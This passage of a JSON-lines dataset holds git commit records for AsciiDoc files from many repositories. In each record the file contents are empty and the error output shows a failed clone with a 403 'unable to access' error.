'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"551c8afd3cb9d2171aa566e9d27ea3befc97747f","subject":"v2.04","message":"v2.04\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"923337501f10ec09df703b87ab2402ed6972e722","subject":"v2.07","message":"v2.07\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7f4182a7fcf6be1066bb84321792d54d7603091","subject":"adding a readme","message":"adding a readme\n","repos":"arun-gupta\/couchbase-xdcr-docker","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arun-gupta\/couchbase-xdcr-docker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7a1d9815366702e4b4c2e6f3f60ed160bbfdbae","subject":"Add readme.adoc","message":"Add readme.adoc\n\n","repos":"JmyL\/bible-clipper,nofearbutlove\/bible-clipper","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JmyL\/bible-clipper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a60d88f3178625ace318c55c250c39edebdcd9","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57a0f60f026254dab4ce3986a8bb91c814a9ff7d","subject":"KUDU-1275 Clarify that you must partition tables during creation, add partitioning rules of thumb.","message":"KUDU-1275 Clarify that you must partition tables during creation, add partitioning rules of thumb.\n\nAlso fix some formatting errors where the section on insertionsgot scrambled amongst the section about partitioning.\n\nChange-Id: Ic366ec19c2ca4edfa5e296c359d641dcf48c1f02\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1546\nReviewed-by: Martin Grund <2546548d516fa64c411fde8242af35f3f80ad31f@cloudera.com>\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"139cff7ea7783bb7d3f1cb5784b6ac448fa7a6a6","subject":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-01-31-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-01-31-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc273005d34c31300f5992598b58fd776ac3d649","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"defe1b0b96dbbfe4221449ec37843574eafe80af","subject":"Update 2015-12-08-Release-asciidoctor-ant-152.adoc","message":"Update 2015-12-08-Release-asciidoctor-ant-152.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-12-08-Release-asciidoctor-ant-152.adoc","new_file":"_posts\/2015-12-08-Release-asciidoctor-ant-152.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0409b826ac9d90b5935e2d65cbb23970db666522","subject":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","message":"Update 2017-12-04-Selenium-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_file":"_posts\/2017-12-04-Selenium-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e824d48fc18b3caac272ba9d6b88d2a85dc66c89","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99521f8451b34fef662f48310ede70b2a72a683f","subject":"Update 2020-04-25-This-week-i-joined-Makerlog.adoc","message":"Update 2020-04-25-This-week-i-joined-Makerlog.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc","new_file":"_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbca7545e13fd373a93294837f497a90643dd795","subject":"Create README-ko.adoc file","message":"Create README-ko.adoc file\n\nREADME korean translation\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/README-ko.adoc","new_file":"docs\/README-ko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4062809ea553f2fd028e877858602b925087347","subject":"y2b create post 5 Cool Gadgets Under $10","message":"y2b create post 5 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-21-5%20Cool%20Gadgets%20Under%20%2410.adoc","new_file":"_posts\/2018-01-21-5%20Cool%20Gadgets%20Under%20%2410.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbf8cc1a005f4e1ee87e6af10d11a676a7939b55","subject":"Initial Developer Documentation","message":"Initial Developer Documentation\n","repos":"Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/alerts.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/alerts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cb887edaf074fdc0bdd5dcccc39da45bd015afa","subject":"Added Camel 2.20.1 release notes to docs","message":"Added Camel 2.20.1 release notes to docs\n","repos":"sverkera\/camel,zregvart\/camel,gnodet\/camel,DariusX\/camel,nicolaferraro\/camel,anoordover\/camel,jamesnetherton\/camel,kevinearls\/camel,pax95\/camel,mcollovati\/camel,davidkarlsen\/camel,gnodet\/camel,mcollovati\/camel,nikhilvibhav\/camel,sverkera\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,christophd\/camel,pax95\/camel,apache\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,Fabryprog\/camel,mcollovati\/camel,alvinkwekel\/camel,tadayosi\/camel,DariusX\/camel,pmoerenhout\/camel,apache\/camel,jamesnetherton\/camel,DariusX\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,ullgren\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,onders86\/camel,CodeSmell\/camel,pax95\/camel,CodeSmell\/camel,anoordover\/camel,punkhorn\/camel-upstream,gnodet\/camel,onders86\/camel,Fabryprog\/camel,christophd\/camel,onders86\/camel,ullgren\/camel,tadayosi\/camel,onders86\/camel,tadayosi\/camel,punkhorn\/camel-upstream,sverkera\/camel,tdiesler\/camel,anoordover\/camel,tadayosi\/camel,tdiesler\/camel,alvinkwekel\/camel,tdiesler\/camel,tdiesler\/camel,zregvart\/camel,adessaigne\/camel,gnodet\/camel,pax95\/camel,Fabryprog\/camel,ullgren\/camel,alvinkwekel\/camel,christophd\/camel,sverkera\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,CodeSmell\/camel,anoordover\/camel,zregvart\/camel,davidkarlsen\/camel,onders86\/camel,sverkera\/camel,mcollovati\/camel,jamesnetherton\/camel,alvinkwekel\/camel,nicolaferraro\/camel,apache\/camel,apache\/camel,kevinearls\/camel,CodeSmell\/camel,objectiser\/camel,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,tdiesler\/camel,sverkera\/camel,DariusX\/camel,ullgren\/camel,kevinearls\/camel,davidkarlsen\/camel,anoordover\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,punkhorn\/camel-upstream,apache\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,adessaigne\/camel,jamesnetherton\/camel,pmoerenhout\/camel,pmoerenhout\/camel,kevinearls\/camel,davidkarlsen\/camel,cunningt\/camel,adessaigne\/camel,objectiser\/camel,objectiser\/camel,tadayosi\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,zregvart\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2201-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2201-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"850e40b0ee154847cb95e318efde5d022af05417","subject":"y2b create post Nintendo NES Deluxe Set Unboxing (1985)","message":"y2b create post Nintendo NES Deluxe Set Unboxing (1985)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-02-07-Nintendo-NES-Deluxe-Set-Unboxing-1985.adoc","new_file":"_posts\/2012-02-07-Nintendo-NES-Deluxe-Set-Unboxing-1985.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edb27469c4a7ee59b4990d7d90ee5d092bd1dd93","subject":"Add contributing docs","message":"Add contributing docs\n","repos":"linlynn\/spring-cloud-build,spring-cloud\/spring-cloud-build,linlynn\/spring-cloud-build,royclarkson\/spring-cloud-build,spring-cloud\/spring-cloud-build,royclarkson\/spring-cloud-build","old_file":"src\/main\/asciidoc\/contributing.adoc","new_file":"src\/main\/asciidoc\/contributing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/linlynn\/spring-cloud-build.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e7430b0fc714d182f2915f3c7162fa2ee78a4fa","subject":"Create faq.asciidoc","message":"Create faq.asciidoc","repos":"addonis1990\/docs,luiz158\/docs,forge\/docs,forge\/docs,agoncal\/docs,addonis1990\/docs,agoncal\/docs,luiz158\/docs","old_file":"get_started\/faq.asciidoc","new_file":"get_started\/faq.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4cdd45d27fdc89143b22b4227aa575a95fd1aa0f","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4db0f963d423a2bd308676876f9e8fb2320fdeff","subject":"Update 20161110-1347.adoc","message":"Update 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1347.adoc","new_file":"_posts\/20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"164807f524502fe5050fbde78d9f27ac790da5a2","subject":"Update 2015-05-18-A-Remplacer.adoc","message":"Update 2015-05-18-A-Remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3573e69ed09b67f2058c524faa03dc83eb42114b","subject":"Update 2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","message":"Update 2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","new_file":"_posts\/2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aac5c6066f6ec622000a0d6442431a088ac1a315","subject":"Add README section detailing relationship to Trace Compass","message":"Add README section detailing relationship to Trace Compass\n\nFixes #21.\n\nSigned-off-by: Alexandre Montplaisir <0b9d8e7da097b5bbfe36e48cca5acfe475f18227@efficios.com>\n","repos":"lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"749ca9de7b8da90d9ee69cd8f100b49ab5f6c1d3","subject":"Clarify build instructions","message":"Clarify build instructions\n\nCloses gh-272\n","repos":"bclozel\/initializr,snicoll\/initializr,nevenc-pivotal\/initializr,gwidgets\/gwt-project-generator,Arsene07\/forge,gwidgets\/gwt-project-generator,gwidgets\/gwt-project-generator,Arsene07\/forge,spring-io\/initializr,bclozel\/initializr,Arsene07\/forge,Arsene07\/forge,snicoll\/initializr,bclozel\/initializr,gwidgets\/gwt-project-generator,spring-io\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,spring-io\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr,snicoll\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snicoll\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db4d0a653caea6f9be47072555c70ba601d6004b","subject":"[docs] - Fix python development section location","message":"[docs] - Fix python development section location\n\nThe Python Client section on the development is wedged between\ntwo of the Spark sub-sections, this patch fixes that issue.\n\nChange-Id: Ia437a3c139f81540e9f6883347afd90cdc565a0a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5414\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1953ace95375571ae4f20d129e953c5f55ea1e62","subject":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","message":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485c48af5af89b4349db669e7e0b9056ce147c12","subject":"Change Log introduced","message":"Change Log introduced\n","repos":"juxt\/yada,mbutlerw\/yada,mbutlerw\/yada,juxt\/yada,juxt\/yada,mbutlerw\/yada,delitescere\/yada,delitescere\/yada,delitescere\/yada","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbutlerw\/yada.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d97fefeacbe9442c4b28372bd879239c29f8213e","subject":"Update 2016-09-28-asd.adoc","message":"Update 2016-09-28-asd.adoc","repos":"jaganz\/jaganz.github.io,jaganz\/jaganz.github.io,jaganz\/jaganz.github.io,jaganz\/jaganz.github.io","old_file":"_posts\/2016-09-28-asd.adoc","new_file":"_posts\/2016-09-28-asd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaganz\/jaganz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"616526f6f66acd151e9e5797ad125d6f33c75220","subject":"Update 2016-04-19-I-Pv4-Subnetting.adoc","message":"Update 2016-04-19-I-Pv4-Subnetting.adoc","repos":"julianrichen\/blog,julianrichen\/blog,julianrichen\/blog,julianrichen\/blog","old_file":"_posts\/2016-04-19-I-Pv4-Subnetting.adoc","new_file":"_posts\/2016-04-19-I-Pv4-Subnetting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/julianrichen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebbef98a5f94885f587fa119a498d9326d8d4085","subject":"Create jme3_ai.adoc","message":"Create jme3_ai.adoc\n\nMoved to advanced dir.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/jme3_ai.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/jme3_ai.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"a02f1b5b5c4a02dca3379e326c9e26d026395d69","subject":"Update 2016-09-23-test.adoc","message":"Update 2016-09-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-test.adoc","new_file":"_posts\/2016-09-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd49fa686a7072d591c3f6499e9bc2d6111ffc9d","subject":"Update 2017-02-05-test.adoc","message":"Update 2017-02-05-test.adoc","repos":"celsogg\/blog,celsogg\/blog,celsogg\/blog,celsogg\/blog","old_file":"_posts\/2017-02-05-test.adoc","new_file":"_posts\/2017-02-05-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/celsogg\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"449d6525cb42e10b23fd6cbfc68c052bce73cf5f","subject":"Update 2017-05-27-rest.adoc","message":"Update 2017-05-27-rest.adoc","repos":"cszongyang\/myzone,cszongyang\/myzone","old_file":"_posts\/2017-05-27-rest.adoc","new_file":"_posts\/2017-05-27-rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cszongyang\/myzone.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3468ce18b40b93e79b2113298c03c0519ca74a7d","subject":"Update 2017-05-30-Test.adoc","message":"Update 2017-05-30-Test.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-30-Test.adoc","new_file":"_posts\/2017-05-30-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d13d9c0a2334c596c827b2ddd92a019f4365879","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4225cfd67f5d8cee6694ed077f9b58dc530191d5","subject":"Update 2016-08-07-Testing-1-2-3.adoc","message":"Update 2016-08-07-Testing-1-2-3.adoc","repos":"MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io","old_file":"_posts\/2016-08-07-Testing-1-2-3.adoc","new_file":"_posts\/2016-08-07-Testing-1-2-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatanRubin\/MatanRubin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf6a367cd974656af451f00a1053e8fa58e193e2","subject":"Update 2014-07-04-KISS.adoc","message":"Update 